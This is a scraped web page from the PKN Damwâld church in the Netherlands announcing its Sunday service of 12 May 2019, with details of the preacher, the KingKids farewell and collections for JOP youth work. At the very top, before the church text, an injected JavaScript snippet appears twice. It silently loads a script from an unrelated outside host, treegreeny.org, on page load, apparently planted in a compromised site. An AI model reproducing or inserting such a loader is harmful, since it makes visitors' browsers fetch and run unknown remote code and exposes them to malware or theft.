;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 12 mei 2019 9:30 uur - PKN Damwâld
zondag 12 mei 2019
09:30 uur
Afscheid KingKids en voorbereiding Heilig Avondmaal

Kerkdienst zondag 12 mei 2019 9:30 uur

Informatie

Voorganger:Ds. G.J. Otter
Mededeling:Afscheid KingKids en voorbereiding Heilig Avondmaal
Locatie: De Ikker Hearewei 1, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Collecte jeugdwerk

Collecte Jeugdwerk - Op school het geloof ontdekken
Voor veel kinderen is geloven niet vanzelfsprekend - soms zijn ze nog nooit in een kerk geweest. Het is fantastisch dat er kerken en scholen zijn die samenwerken om het kinderen het christelijk geloof en de kerk te laten ontdekken. JOP, Jong Protestant, ondersteunt kerken en scholen in hun samenwerking. JOP denkt mee over de invulling van school- en kerkvieringen, ondersteunen kerken bij godsdienstonderwijs en denken mee over de identiteit van de school. JOP organiseert netwerkbijeenkomsten en maakt ondersteunende materialen. Via een besloten Facebookpagina kunnen kerken en scholen hun ideeën en vragen rond samenwerken delen. Met uw bijdrage kan JOP kerken en scholen ondersteunen om de relatie tussen school en kerk vorm en inhoud te geven.

Tweede collecte: Kerk
Uitganscollecte: Kerk